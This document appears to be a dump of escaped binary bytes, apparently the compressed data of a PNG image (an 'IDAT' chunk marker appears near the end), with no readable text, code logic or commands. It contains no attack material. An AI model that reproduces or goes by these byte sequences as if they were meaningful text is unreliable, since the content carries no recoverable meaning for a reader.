cdX\\xa5R\\\n\\xb1\\xc8\\xc8H\\xb6i\\xd3&\\xb4\\xec\\xd2\\xa5KI\\xc7\\x95\\\n\\x9a\\x9a\\xcaZ\\xb7nm\\xf0\\x1bL\\xbbI\\xf9,XQ\\\nQ\\x81~\\xcbWz\\xc3\\xe6\\xe8UUU\\xa1\\x1d@\\x9e\\\n\\x9b\\xa3\\xa3#\\xbbr\\xe5\\x0a\\xe9\\x1a\\xd1\\xc5\\x90!CP\\\n6\\xb4n\\xdd\\xfa\\x91lQQ\\x11\\x1b0`\\x00\\xf9x\\\n\\xa6N\\x9d\\xaa\\xd3\\xae\\x9f~\\xfa\\x09=\\xde\\x96-[d\\\n\\x9d\\x8b7\\xdf|\\x13\\xa5o\\xe7\\xce\\x9d\\x92\\xf7\\xb5\\xb2\\xb2\\\n\\x92e[UU\\x15:\\xff\\xb0q\\xe3\\xc6\\x8f\\xbd|H\\\na\\xc4\\x88\\x11\\xe8\\xf3~\\xeb\\xd6-\\x16\\x11\\x11\\xa1\\xf8\\xfd\\\n\\xfd\\xca+\\xaf\\xc8:\\x875\\xf9\\xf8\\xe3\\x8f\\xd16P\\xbf\\\n\\xea\\xe4\\xe7\\xe7\\xcbZ\\xab!w[\\xb8p!\\xf9<\\xed\\\n\\xdb\\xb7\\x0f\\xad\\xef\\xef\\xbf\\xffV\\xe4+h\\xcd\\xcd\\xd0~\\\nHdd$\\xfa\\x13=\\xcf\\xed\\xab\\xaf\\xbe\\xe2z<\\xff\\\n\\xfd\\xef\\x7f\\xd16\\x5c\\xbcx\\xf1\\x91\\xfc\\xf2\\xe5\\xcb\\xc9\\xc1\\\n\\x1dkk\\xebZ\\xa3\\xce\\xb2\\x1c\\xda\\x98\\x98\\x18\\x921_\\\n~\\xf9\\xa5\\x1c\\xb5\\x06g\\xc3\\x86\\x0d\\x06\\xf9\\xcc\\x03\\x00\\xac\\\ne\\xcb\\x96\\xec_\\xff\\xfa\\x17Zn\\xd3\\xa6M\\xe8\\xe3*\\\n,,d\\xed\\xdb\\xb77\\xda\\x0d\\x06\\xf00\\x9fz\\xef\\xde\\\n\\xbdu\\xday\\xed\\xda5\\xa3\\xdaXs\\xab\\xebswm\\\n\\xa8\\xd5j\\xae9\\xd7\\xd4\\xadC\\x87\\x0e\\x5c#U\\xcd\\x9b\\\n7G\\xe9\\xd7.\\x00*--e\\x83\\x07\\x0f\\x96u,\\\n\\x1f|\\xf0\\x81N\\xbb6n\\xdc\\x88\\x1e\\xef\\xd7_\\x7f\\x95\\\nu.0/\\x85\\x81\\x81\\x81\\xec\\xc4\\x89\\x13\\x92\\xf7W\\xa9\\\nT\\xb2l\\xa3|\\xf1\\x995k\\x16ZO\\xcb\\x96-Q\\\n:\\xac\\xac\\xac\\xd8\\xb6m\\xdb\\x98\\xb9\\xb9\\xb9A\\xae\\x7f]\\\n\\xf9\\xdb\\x14(\\x11\\xef\\xd3\\xa7O\\xa3\\xf5TVV\\xca\\xbe\\\nWxl\\xd4|\\xe4\\xef\\xbe\\xfb\\x0e\\xa5G\\xa5RIZ\\\n\\x10\\xc4cS\\xa9T\\x5c\\x16\\x83Ja\\xdb\\xb6mF\\x0f\\\n\\xcaXXX\\xb0s\\xe7\\xceq;\\xa6\\x85\\x0b\\x17\\xa2\\xcf\\\n\\xb76*\\xfe\\xf5\\xd7_\\xcb:\\x96V\\xadZ\\xd5j\\x93\\\n,\\x87v\\xcd\\x9a5$c~\\xff\\xfdw9j\\x0dJ\\\nLL\\x8c\\xc1/D\\xca\\xa77l\\x12\\xbfF\\xa3a\\xcf\\\n=\\xf7\\x9cQo0\\xed\\xd6\\xa4I\\x13\\x96\\x9b\\x9b\\xab\\xd3\\\n\\xd6\\xc8\\xc8H\\xa3\\xdbX}\\xc3\\xe6+\\xcf\\x981\\xc3\\xe8\\\n6k\\xb7\\xcf>\\xfb\\x0ce\\xbb.\\xca\\xcb\\xcb\\xd1\\x8e\\xc8\\\n[o\\xbd\\xc5\\xaa\\xaa\\xaa\\xd8\\xe8\\xd1\\xa3e\\x1f\\xc7\\x9a5\\\nkt\\xdaFY\\x9c\\xb4n\\xdd:\\xf2\\xb9HJJB\\\n\\xe9\\x9a;w.\\xfas]ee%\
\xd9\\xbe\\xa5K\\x97\\\n\\xa2\\xcf\\xc7\\xbe}\\xfbP:***P\\x0b\\xdd\\x00\\x80\\\n\\xd9\\xda\\xda\\x1a4b\\xd5\\xb2eKt\\xd4Y\\x17=z\\\n\\xf4@\\xeb\\xcf\\xc9\\xc9A\\xeb\\xa1V\\x11\\xe2\\xbd\\xd9\\xdb\\xdb\\\n\\xb3\\x9b7o\\xa2\\xed\\xc7~\\xb90\\xf4\\xd6\\xb6m[n\\\n\\xd7\\x84.v\\xef\\xdem\\xb0\\x976}[\\xe7\\xce\\x9d\\xb9\\\n\\xe5\\xd3N\\x980\\x01\\xa5\\xdb\\xc7\\xc7\\x871\\xf6\\xd0o\\x94\\\n\\x9bv7b\\xc4\\x88Zm\\x92U\\x10\\x8fZ\\x83\\xb6\\xbe\\\nt\\x86INN\\x86\\xb0\\xb00\\xee\\xad,\\xf5\\x81-~\\\n\\x0e\\x80?\\xa7[\\xb7n\\x85\\xed\\xdb\\xb7\\xa3\\xf5(AZ\\\nZ\\x1a,X\\xb0@\\xe7\\xdf)\\xdd\\x87\\x94\\x04\\xd3]\\xec\\\n\\xc7\\x1f\\x7f\\x84\\xf5\\xeb\\xd7+g\\x0c\\x92/\\xbe\\xf8\\x02\\xee\\\n\\xdf\\xbf/{\\x9c\\xa4\\xa4$\\xa8\\xaa\\xaaB\\xc9\\xb4l\\xd9\\\n\\x12\\x96-[\\x06\\x7f\\xfe\\xf9\\xa7l\\xfdu\\xd5Y4t\\\n\\xeb[l3\\x85\\xa1C\\x87BYY\\x19JF\\x8e}\\\n\\xd8\\xfa\\xb3\\xce\\xce\\xce0h\\xd0 \\x94LJJ\\x0a\\xba\\\n\\x96oii)\\xfa<\\xc8\\xe1\\xe6\\xcd\\x9b\\xb0k\\xd7.\\\nncapuuE\\xd7\\x08?}\\xfa4\\xac\\x5c\\xb9\\\n\\x12%\\xa3\\x14\\xc5\\xc5\\xc5O\\xd6\\xfc\\x94\\x80\\xa9\\xcd\\xdd5\\\nIHHxT\\xb3V\\x09n\\xdc\\xb8\\x01\\xd3\\xa6MC\\\n\\xcf\\x95Jq\\xfe\\xfcy\\xd8\\xb8q#\\x97\\xb1\\xb0\\xf7@\\\n`` \\x5c\\xb8p\\x01\\xe6\\xcd\\x9b\\x87\\xae\\xb3^\\x13]\\\n\\xf3\\xbf\\xc1\\x1dZ\\x95JU/\\x9a*\\xa8\\xd5j\\x984\\\ni\\x12dgg\\x1b\\xdb\\x14\\xbd\\xb8\\xbb\\xbb\\xa3\\xba#\\x95\\\n\\x95\\x95\\xc1\\xa2E\\x8b\\x14\\xb4\\x08Oxx\\xb8\\xce\\xc6\\x0d\\\n\\xd7\\xaf_7\\xb05u#\\xd5\\xa1=u\\xea\\x14\\xbc\\xfd\\\n\\xf6\\xdb\\x0a[\\x83\\xa3\\xb0\\xb0\\x10\\xfe\\xf3\\x9f\\xff\\xc8\\x1e\\x87\\\nr\\xef\\xa7\\xa7\\xa7\\xc3\\x92%Kd\\xeb\\x06\\x80:\\x8b\\xa4\\\n\\x1b\\xba\\xf5-\\xc6a\\xb4\\xb0\\xb0\\x80\\x81\\x03\\x07\\xa2\\x1d9\\\nj\\xe3\\x87\\xbc\\xbc<8}\\xfa4Jf\\xcc\\x981`\\\nee\\x85\\x92\\xa1\\x067\\x0c\\xcd7\\xdf|#{\\x8c\\x07\\\n\\x0f\\x1e\\xc0\\x83\\x07\\x0fP2\\xd8\\x80\\x03c\\x0c\\xdey\\xe7\\\n\\x1d\\xd9\\x0f~\\x9e\\xc4\\xc4\\xc4\\xa0\\x9b\\xd7\\xd4\\x87\\xebb\\xd9\\\n\\xb2e\\x8a\\x9c\\xe7\\x92\\x92\\x12\\x988q\\x22)@\\xa5$\\\n<\\x8e\\x971\\x86n\\xfc\\xe4\\xe5\\xe5\\x05\\x93'O\\xe6\\xf2\\\n\\x12\\xabk\\xfe\\x97\\xe5\\xd0R\\xda\\xde\\xfa\\xf8\\xf8\\x80\\xad\\xad\\\n\\xad\\x1c\\xb5\\x06a\\xf9\\xf2\\xe5p\\xe6\\xcc\\x19c\\x9b!\\x09\\\n\\xecd\\x19\\x1e\\x1e\\x0e\\xc9\\xc9\\xc9\\xb2tZZZB\\xcf\\\n\\x9e=a\\xca\\x94)0c\\xc6\\x0c\\x08\\x09\\x09\\x0177\\\n7\\xf2xUUU\\xf0\\xed\\xb7\\xdf\\xd6\\xfa7Ssh\\\n\\x03\\x03\\x03\\xf5\\xee\\x93\\x93\\x93\\x03aaa\\xdcZ\\xaa\\xf2\\\n\\xe4\\x7f\\xff\\xfb\\x9fl\\xbb(\\xf7\\xfe\\xca\\x95+\\xb9D*\\\n,--\\xa1i\\xd3\\xa6:\\xffN\\x89\\xd0R\\x1d\\xc6\\xca\\\n\\xcaJ8|\\xf8\\xb0\\xe4\\xfd{\\xf6\\xec\\x09\\x8d\\x1a52\\\nX\\x84\\xf6\\xd0\\xa1C\\xe8c\\xc3t\\x07\\xd3R\\x1f\\x1c\\x17\\\n\\x00\\x80\\xd8\\xd8X\\xd9A\\x0a\\xca\\xb1b\\xe7\\xe8\\xa8\\xa8(\\\n8q\\xe2\\x04ZOu\\xcc\\xcd\\xcd!88\\x18&O\\\n\\x9e\\x0c\\xaf\\xbc\\xf2\\x0a\\x8c\\x1e=\\xba\\xce\\xfbF\\x0a_\\x7f\\\n\\xfd\\xb5\\xe4}\\xd5j5$%%\\xc9\\xd2g\\x08\\xae^\\\n\\xbd\\x0a\\xb1\\xb1\\xb1\\xdc\\xc7\\x9d3g\\x0e\\x5c\\xbat\\x89\\xfb\\\n\\xb8rILL\\x84\\xe8\\xe8hYc\\xa4\\xa7\\xa7Cq\\\nq1Jf\\xd7\\xae]\\xdc\\x9e\\xe5\\xba\\x22\\xb4\\xb2Z\\xdf\\\n\\x1a\\xe2\\xc66\\x06\\x17.\\x5c\\x80\\xa5K\\x97\\xca\\x1a\\xc3\\xd1\\\n\\xd1\\x11&O\\x9e\\x0c]\\xbat\\x81f\\xcd\\x9aAAA\\\n\\x01\\xdc\\xb9s\\x07v\\xed\\xda\\x05\\xa7N\\x9d\\xe2d\\xe9C\\\n\\xb0\\xe7\\xf4\\xbf\\xff\\xfd/Y\\x97\\xa7\\xa7',^\\xbc\\x18\\\n\\xa6M\\x9b\\xf6DTX\\xadV\\xc3\\x81\\x03\\x07`\\xd1\\xa2\\\nE\\xe8\\x16\\x8c\\x00\\x00k\\xd7\\xae\\x85\\x7f\\xff\\xfb\\xdfOD\\\n\\x87L\\xed\\xb3\\x95\\x94\\x08\\xed\\xe2\\xc5\\x8b!55\
\x95\\xac\\\n\\xc3\\xc2\\xc2\\x02\\x86\\x0d\\x1b\\x06\\xa3F\\x8d\\x82\\xe0\\xe0`\\xf0\\\n\\xf0\\xf0\\x80\\xf2\\xf2r\\xb8{\\xf7.DEE\\xc1\\xc6\\x8d\\\n\\x1b!++\\x8b4vff&\\xec\\xdf\\xbf\\x1f\\xc6\\x8e\\\n\\x1dK\\xb6\\x8fr\\xef\\xf3\\xfa\\xbc\\xdc\\xacY\\xb3:\\xdb\\xa5\\\n\\x1a2\\xe5\\xe0\\xc4\\x89\\x13PPP y\\xffQ\\xa3F\\\n\\x01\\x00\\xa0\\xdb\\xb3R\\xed\\xc3\\xa6C\\xd8\\xdb\\xdb\\xc3\\xf0\\xe1\\\n\\xc3\\xd1z\\x94\\xbaG---\\xc1\\xd2\\xd2\\x12JJJ\\\n\\xb8\\x8c\\xc7\\x18\\x83#G\\x8e\\xc0\\xa4I\\x93\\xc8c\\x18\\xe2\\\n\\xb9\\xf7\\xf3\\xcf?\\xa3uhqrr\\x82w\\xdf}\\x17\\\nf\\xce\\x9c\\x09\\xde\\xde\\xde\\x8f\\xfd\\x8d1\\x06\\xb1\\xb1\\xb1\\xb0\\\nx\\xf1b8v\\xec\\x18z\\xec={\\xf6@jj\\xaa\\\n$\\xc78%%\\x85k\\xba\\x9e\\x93\\x93\\x13\\x8c\\x193\\x06\\\nF\\x8e\\x1c\\x09~~~\\xe0\\xe1\\xe1\\x01YYY\\x90\\x98\\\n\\x98\\x08k\\xd7\\xae\\x85\\x93'O\\x92\\xc7^\\xbf~=<\\\n\\xf3\\xcc3\\xdcl=t\\xe8\\x10DDD\\xc8\\x1a#(\\\n(\\x08\\x9e{\\xee9\\xe8\\xd5\\xab\\x174m\\xda\\x14\\xcc\\xcd\\\n\\xcd!++\\x0b\\xce\\x9e=\\x0b\\xbf\\xfd\\xf6\\x1b\\xc4\\xc7\\xc7\\\n\\x93\\xc7\\x0e\\x0f\\x0f\\x87!C\\x86\\x90\\xe5)\\x01\\x0d\\x9e\\xe9\\\nE:\\xbf\\xd0Q\\x13\\x82\\xb3\\xb2\\xb2H\\xc9\\xbc\\xaf\\xbe\\xfa\\\n*U\\xa5\\xc1\\x90SN\\xc8\\xcc\\xcc\\x8c-Z\\xb4\\xa8\\xce\\\n6\\xb4g\\xce\\x9c\\xe1\\xda\\x8d\\xeb\\x93O>\\x91|l\\xf1\\\n\\xf1\\xf1d=\\xc3\\x86\\x0dc\\xf9\\xf9\\xf9zuTVV\\\n\\x92KT\\x1d;v\\xec\\x89\\xf1\\xce\\x9d;\\xc7\\xce\\x9e=\\\n\\xabs[\\xb0`\\x01J\\x87\\x87\\x87G\\x9d\\xe3\\xe9\\xdb\\xf4\\\n-\\xd09{\\xf6\\xac\\xac\\xaa\\x18\\xa1\\xa1\\xa1z\\xbb\\xa9=\\\nx\\xf0\\x80M\\x9a4\\x89\\xacc\\xc6\\x8c\\x19z\\x7f\\xc7\\xba\\\n\\x08\\x09\\x09\\xe1v\\xfd\\xea\\xda\\xfc\\xfd\\xfd\\xd9\\xa4I\\x93\\xd8\\\n?\\xff\\xf9O\\xb6b\\xc5\\x0a\\xb6b\\xc5\\x0a\\xb6t\\xe9R\\\n\\xbd\\xeds\\xd5j5z\\xd1\\x01\\xa6&ru\\xde\\x7f\\xff\\\n}\\x94\\x9e\\xbf\\xff\\xfe\\x9b1\\xf6\\xb0\\xfe\\x22F\\xae\\xb6\\x9a\\\n\\x8bR\\xf0\\xf5\\xf5E\\xe9\\x09\\x0b\\x0b#\\xe9\\x199r$\\\n\\x97\\xdf\\xdc\\xc6\\xc6\\x86M\\x9f>\\x9dEFF\\xb2\\x8c\\x8c\\\n\\x8cG\\xe3\\xe7\\xe6\\xe6\\xb2C\\x87\\x0e\\xb1\\xa9S\\xa7\\xca\\xae\\\n83w\\xee\\x5c\\xd21jY\\xb2d\\x09ZgDD\\\n\\x84\\xe4\\xf1\\xb3\\xb3\\xb3\\xc9\\x0b\\x91;u\\xea\\xc4\\xee\\xdd\\xbb\\\n\\xa7W\\x87F\\xa3a\\xcb\\x96-#-\\xce\\x91z,\\x94\\\n\\x92]\\xb5mVVVl\\xe1\\xc2\\x85z\\x9f=\\x9b7\\\no&/2l\\xd4\\xa8\\x91\\xac\\x85\\x97\\xd5\\xa9\\xa8\\xa8@\\\n\\xb7\\x84\\xad\\xbe\\x05\\x04\\x04\\xb0?\\xfe\\xf8\\xa3N\\x1d\\x1a\\x8d\\\n\\x86\\xfd\\xf0\\xc3\\x0f\\xcc\\xca\\xca\\x8a\\xa4\\xc3\\xc5\\xc5\\x85UT\\\nT\\x90\\x8fq\\xed\\xda\\xb5\\x5c~[}\\xbf\\xc9\\xd0\\xa1C\\\n\\xd9\\x1bo\\xbc\\xc1\\x96-[\\xf6\\xe8\\x19\\xf0\\xee\\xbb\\xef\\xea\\\n\\xbc\\x16\\xc8\\x0e-\\xa6\\xecL\\xf5\\x8d\\xfa\\xe00\\x14\\xbbw\\\n\\xef&\\xff\\x00\\x8e\\x8e\\x8e\\xec\\xd0\\xa1C\\x92\\xf4\\xe4\\xe7\\xe7\\\n\\xb3\\xfe\\xfd\\xfbs\\xf9\\xe11%\\x87>\\xff\\xfcs\\x92\\x8e\\\n\\xe0\\xe0`t\\xbb\\xe2y\\xf3\\xe6\\xa1\\xf5PV\\xe1c\\x0b\\\n\\xba\\xf7\\xeb\\xd7\\x0f\\xadC*\\x1a\\x8d\\x86\\xf5\\xee\\xdd\\x9bt\\\n\\x8e\\xcd\\xcd\\xcdQ\\xe5q\\xd4j5\\xd9\\x91\\x90\\xdb*Y\\\n\\xa9F\\x17-[\\xb6d_|\\xf1\\x05\\xbb}\\xfb\\xb6,\\\n\\xfb\\xb0\\xc5\\xba?\\xfd\\xf4S\\x92\\x1eLC\\x12??\\xbf\\\nGr\\xd8y\\x86r>._\\xbe\\x8c>\\xff\\x94\\xf2\\x7f\\\n\\x8c\\xe1\\xdb\\x9b\\xd6\\xb6\\x8d\\x181B\\xd2J\\xfa\\xbd{\\xf7\\\n\\xca\\xea\\xb4\\x17\\x12\\x12B:F-/\\xbd\\xf4\\x12Z\\xe7\\\n\\x89\\x13'$\\x8f\\xbfy\\xf3f\\xd2qy{{\\xa3+\\\n)\\xac\\x5c\\xb9\\x12\\xadGjM\\xdfo\\xbf\\xfdV\\xf65\\\n\\xe1\\xe5\\xe5\\xc5\\xce\\x9e=+\\xf9x\\xf6\\xec\\xd9C\\xd6u\\\n\\xfc\\xf8q\\xd4\\xb9\\xd3\\x05\\xe5\\x9cj\\xb7\\xf1\\xe3\\xc7\\xd7\\x
19\\\n\\x0c\\xab\\xc9/\\xbf\\xfcB\\xd6u\\xf4\\xe8Q\\xf21.^\\\n\\xbcX\\xf6o[\\xdb\\xe6\\xe0\\xe0\\xc0\\xe6\\xce\\x9d\\xcb\\x8e\\x1e\\\n=J\\xaa\\xc6@vh)\\x9dR\\x00\\x1e\\xef\\xd3lj\\\n\\xa8\\xd5j\\xf2\\x9b\\x95\\x95\\x95\\x15;x\\xf0 J_F\\\nF\\x06\\xf3\\xf1\\xf1\\x91}\\x11\\x9c:uJ\\xb2NjM\\\n\\xc3\\x93'ObO'+++c\\x9d:uB\\xe9\\\n\\x193f\\x0cZ\\x0f\\xb6\\xc0\\xbf\\x92_\\x09~\\xfd\\xf5W\\\n\\xd2\\xf9533c[\\xb7nE\\xeb\\xbb\\x7f\\xff>\\xf9\\\n\\xe1\\xae/\\x0a\\xac\\x0bJ;K}\\x9b\\xbf\\xbf?\\xdb\\xb4\\\ni\\x13\\xb7\\x922\\xd8\\xfb\\xea\\xa3\\x8f>B\\xeb\\xc8\\xc8\\xc8\\\n@E\\xb8\\xe6\\xcd\\x9b\\xf7H\\x16\\xdbY\\xec\\xda\\xb5kh\\\n\\xfb\\xb0\\x0fV\\x1b\\x1b\\x1b\\xd4\\xc3T\\x8bZ\\xad&G\\x8a\\\n\\xb4\\xdb\\x9c9sP\\xbf\\xfd\\x8e\\x1d;\\xc8\\xba\\x82\\x83\\x83\\\n\\xd1\\xc7X\\x1d\\xca\\x0b+\\xa6\\xd5\\xea\\xacY\\xb3H\\xc7\\xb5\\\nq\\xe3F\\xf4\\xb1h4\\x1at\\x19\\xbd\\xf6\\xed\\xdbK\\x1a\\\n\\xfb\\x1f\\xff\\xf8\\x87\\xack\\x22 \\x80\\xf4\\x227m\\xda\\\n4\\x92>\\xcc\\x97N]dee1'''\\x92\\xfe\\\n\\xa9S\\xa7\\x92J\\x88a\\xcbgi\\xb7e\\xcb\\x96\\x91\\x8f\\\nS\\xce\\xd7\\xc1\\xda6\\x1b\\x1b\\x1b\\xf6\\xfe\\xfb\\xef\\x93J\\xdb\\\nU\\x87\\xec\\xd0R\\x8a\\xff\\x03\\x00;\\x7f\\xfe\\xbc,\\x83\\x95\\\n\\x04\\xfb\\x19\\xb0\\xfa\\xb6z\\xf5j\\x92\\xce?\\xfe\\xf8C\\xf6\\\n\\xc5p\\xff\\xfe}I\\xba\\xd4j5\\xa9Uq]mF\\\n\\xf5\\x81u\\xf0\\xbat\\xe9\\x82\\xd6\\xd1\\xb4iS\\x94\\x8e/\\\n\\xbe\\xf8\\x82|\\xb6\\xd2\\xd2R\\xd4\\xe7\\xdf&M\\x9a\\xa0\\xc6/,\\\n,D\\xe7\\x81)\\xd5\\xd8\\xe3\\xe0\\xc1\\x83\\xa4\\xf3;|\\xf8\\\npY\\xd7\\xcf\\xfd\\xfb\\xf7I\\x112jD\\xe2\\xc0\\x81\\x03\\\n\\x5c&\\xb2F\\x8d\\x1a\\xb1={\\xf6\\x90\\x8f\\xbb.z\\xf5\\\n\\xea\\x85\\xb2e\\xc1\\x82\\x05h\\x1d\\x98nQ\\x0e\\x0e\\x0e\\xac\\\n\\xb4\\xb4\\xf4\\x91,\\xb6\\xcb\\x226\\x10P\\x5c\\x5c\\x8c\\xce'\\\n\\xa46\\x97\\x90s=\\xb4k\\xd7\\xeeQ\\xf7 
,\\xd4(\\\n\\xad\\x93\\x93\\x13I\\x1fc\\x8c\\xe5\\xe5\\xe5\\xa1\\xf5a^\\xd2\\\nKKKI\\xce\\xc9?\\xfe\\xf1\\x0f\\xf211\\x86\\xebt\\\n\\x07\\x00\\x8f]\\xcb\\xba\\xa0\\xa6%\\xa9T*\\xd9]\\xdd(\\\nM\\x83\\xdc\\xdc\\xdcd\\xe9,++c\\x9e\\x9e\\x9eh\\xbd\\\n\\x8d\\x1a5b)))\\xb2tS\\xdaNK\\x8d\\xb4\\xd7\\\n\\x06\\xa5\\xf9Sm\\xdb\\x82\\x05\\x0b\\xb8\\xe5.3&\\xa3\\xb1\\\n\\x02e\\xa5\\xa7\\x97\\x97\\x178::RU*\\xca\\xb1c\\\n\\xc7\\xd0\\xf5\\x1a\\x01\\x1e\\xae\\x0a\\xfe\\xdf\\xff\\xfe\\x87^\\xb5\\x5c\\\n\\x9dw\\xdf}\\x97,\\x8bY=K-!\\xd2\\xbf\\x7f\\x7f\\\n\\x92\\x1c\\x00\\x80\\x8d\\x8d\\x0dt\\xe8\\xd0A\\xf2\\xfeYYY\\\n\\xa8\\x1ay\\xd7\\xae]C\\xd7\\xd4k\\xdd\\xba5j\\x7f\\xa9\\\n`J\\xdah\\xb1\\xb2\\xb2\\x82\\x1f~\\xf8A\\xd6\\xf5\\xe3\\xe6\\\n\\xe6\\x06#F\\x8c@\\xcbQV\\xaa\\x02\\xf0)\\xd1\\xd4\\xa4\\\nI\\x13\\x88\\x8d\\x8d\\x85\\x91#G\\xca\\x1e\\xab6\\xb0\\x95\\x0e\\\n\\xb0\\xab\\xb15\\x1a\\x0dDEEI\\xde\\x7f\\xd8\\xb0a`\\\ncc\\xf3\\xe8\\xbf\\xad\\xad\\xadQ\\xfa\\xb0\\xa5\\xb7bbb\\\nP\\xab\\x8a---\\xc9U/\\xe4\\x5c\\x0fk\\xd6\\xac\\x01\\\n;;;\\x92\\xec\\xc8\\x91#\\xd1\\xf5r\\x01\\x1e\\x1e+\\x15\\\n\\xa5+\\x1c\\x5c\\xbdz\\x95T\\xdan\\xc0\\x80\\x01h\\x99\\xea\\\nt\\xef\\xde\\x1d\\xb5\\xbf\\xbe\\x0a+j\\xb5\\x9a\\x5c\\x1ar\\xfa\\\n\\xf4\\xe90l\\xd80\\x92\\xac\\x96)S\\xa6\\xa0err\\\nr\\xe0\\xde\\xbd{d\\x9d\\x1b7n\\x84\\xcc\\xccL\\xb4\\xdc\\\n\\xc7\\x1f\\x7f\\x0c\\xcd\\x9a5#\\xeb\\x05\\x00x\\xe1\\x85\\x17\\xd0\\\n2III\\xa4z\\xb4\\xd9\\xd9\\xd9\\xb2k\\xeb\\xaaT*\\\nX\\xbdz5|\\xf5\\xd5W`a!\\xab\\xd8\\xd6c\\x90\\\n\\x1dZ\\xca\\xc3\\xd0\\x94\\x1b*PKY\\xbd\\xf5\\xd6[\\xe0\\\n\\xe3\\xe3#K\\xf7\\x88\\x11#\\xc8\\x8e>\\xe6\\x9cR~3\\\nsss\\x08\\x0a\\x0aB\\xcbU\\xa7}\\xfb\\xf6\\x92\\xf7e\\\n\\x8c\\xa1\\x9c\\xbb\\xc4\\xc4D\\x94-\\xe6\\xe6\\xe6u\\x16\\xe5\\xa7\\\n\\x92\\x90\\x90\\x80\\xee\\xc8\\x04\\x000o\\xde<.\\xf7\\xc5\\xb3\\\n\\xcf>\\x8b\\x96\\xa1:\\xb4T9-\\xee\\xee\\xee\\x10\\x15\\x15\\\n\\x85\\xba.\\xb0`\\x9b+`\\x1d\\xc6s\\xe7\\xce\\xa1\\xea\\x99\\\n\\x8e\\x1b7\\xee\\xb1\\xff\\xb6\\xb7\\xb7G\\xe9\\xc3:\\xdc\\xd8r\\\n]\\x03\\x06\\x0c@w\\xb2\\xd2BuhG\\x8f\\x1e\\x0d\\xbd\\\nz\\xf5\\x22\\xc9\\x02<|Y\\xa6\\xdc\\xcbr\\x1e\\xa0\\x94k\\\n\\x1f\\xe3\\xd0R\\xef\\xad\\xe0\\xe0`\\x92\\x9c\\x16\\xec\\xbd\\xa8\\xcf\\\n\\x11JNN&\\x95\\xecrvv\\x86\\xaf\\xbe\\xfa\\x0a-\\\nW\\x93\\x81\\x03\\x07\\xd6Y\\xdaO\\x17\\x94r\\x93\\x00\\x0f\\xcf\\\n\\x07%\\xa0\\xd1\\xa2E\\x0b\\x98?\\x7f>Igu(\\xf3\\\n\\x7fII\\x09\\xa4\\xa5\\xa5\\xa1\\xe5x\\x044\\xbe\\xfb\\xee;\\\nx\\xfd\\xf5\\xd7e\\x8fS\\x13\\x92C\\x9b\\x97\\x97Gj\\x9f\\\ni\\xaa\\xd7v\\x8d\\x81\\x00\\x00 \\x00IDAT5h\\\n\\x0b\\x0b\\x0b\\xe1\\xf7\\xdf\\x7fG\\xcb\\xb9\\xb9\\xb9\\xc1\\xc2\\x85\\x0b\\\ne\\xeb\\xb7\\xb1\\xb1!\\xbf\\x91b\\xce)\\xb6\\xbb\\x0d\\xc0\\xc3\\\n\\xba\\xb3r\\x22\\x1a\\x00\\x80zPb#WX\\x87\\xd6\\xdf\\\n\\xdf\\x1f\\xadC\\x0a\\xeb\\xd6\\xadC\\xbf\\xed\\xba\\xba\\xba\\xc2\\x87\\\n\\x1f~\\xc8E\\x7f\\x9f>}\\xd02\\xc6\\x88\\xd0\\x9a\\x9b\\x9b\\\n\\xc3\\x96-[\\xa0]\\xbbv\\xe41\\xa4\\xa0t\\x84\\x16\\xe3\\\n0ZXX<\\xaa?\\xabEi\\x87\\x16\\xfbr5q\\\n\\xe2D\\xd4\\xfe\\xd5\\xa1^\\x0f\\xff\\xfa\\xd7\\xbf\\xc8:\\xb5H\\\nirR\\x139\\xf7\\xbf\\xd2\\x11Z\\xca\\x1c\\x0d\\x00\\xb2\\x1b\\\n&\\xb8\\xb8\\xb8\\xa0\\xf6\\xd7w\\x0e\\xa9\\xd7\\xc4\\x9c9sd\\\n5\\xe8\\xd1\\xe2\\xe2\\xe2\\x02\\x1d;vD\\xcb\\xdd\\xb9s\\x87\\\n\\xa4\\xef\\xcc\\x993\\xa4/\\xa0+V\\xac 
[escaped binary PNG image data elided]
\\x08\\xde\\xb8\\xb8\\xba\\xea|-\\\n5\\xc8W\\x8d\\x89\\x89\\x09>\\xffb\\x06\\xe7\\xf3\\xcf\\x9f?\\\n+\\xa27\\xbaaai!\\x8a\\xdd\\xdc\\x9c\\x5cQ\\xec\\x12\\\n\\x04a\\x9c\\x90\\xa0%\\x08\\x8275k\\xd6\\xd2\\xf9\\xda\\xbc\\\n<\\x12&\\xeah\\xdf\\xa1#\\xfc\\xfc\\xfc9\\x9d\\x1b\\xf6\\xe6\\\n\\x0d^\\xbf~%\\xb2G\\xda!V\\xca\\x01\\xbd\\x08\\x11\\x04\\\nQ\\x1a\\x12\\xb4\\x04A\\xf0\\xa6\\x9e\\x8f\\x8f\\xce\\xd7\\x920\\xd1\\\n\\xcc\\xc7c\\xc6r>\\xf7\\xd2\\xc5\\x0b\\x22z\\xa2=\\x16\\xe6\\\n\\xe2Dh\\xe9\\xef\\x86 \\x88\\xd2\\x90\\xa0%\\x08\\x827\\xf5\\\n\\xea\\x91\\xa0\\x15\\x93\\x8e\\x9d:\\xa3f-nQ\\xf0K\\x17\\\n\\xca\\x96\\xa0\\x15\\xa3?.\\x00\\xe4\\xe4d\\x8bb\\x97 \\x08\\\n\\xe3\\x84\\x04-A\\x10\\xbc\\xe1#h\\x93\\x12\\x13\\x05\\xf4\\xa4\\\n|\\x22\\x91H0\\xf2\\xa3\\x8f9\\x9d\\x1b\\x1a\\x1a\\x82\\xa8\\xc8\\\nH\\x91=\\xe2\\x8eL4AK/B\\x04A\\xfc\\x07\\x09\\\nZ\\x82 xcgo\\x0fg\\x17\\xdd\\xfa\\xd1\\xc6\\xc7\\xc7\\\n\\x09\\xecM\\xf9\\xa4_\\xff\\x01pt\\xac\\xc6\\xe9\\xdc\\xfb\\xf7\\\n\\xef\\x89\\xec\\x0dw\\xc4\\x8a\\xd0\\x16\\x15\\x15\\xa1\\xb0\\xb0P\\x14\\\n\\xdb\\x04A\\x18\\x1f$h\\x09\\x82\\x10\\x84&Mt\\x1b\\x93\\\n\\x1a\\x1f\\x1f/\\xb0'\\xe5\\x13sss\\x0c\\x1c4\\x88\\xd3\\\n\\xb9\\x0f\\xee\\xdf\\x17\\xd9\\x1b\\xee\\x88%h\\x01\\xa0\\xa0\\xa0@\\\n4\\xdb\\x04A\\x18\\x17\\xa6\\x86v\\x80 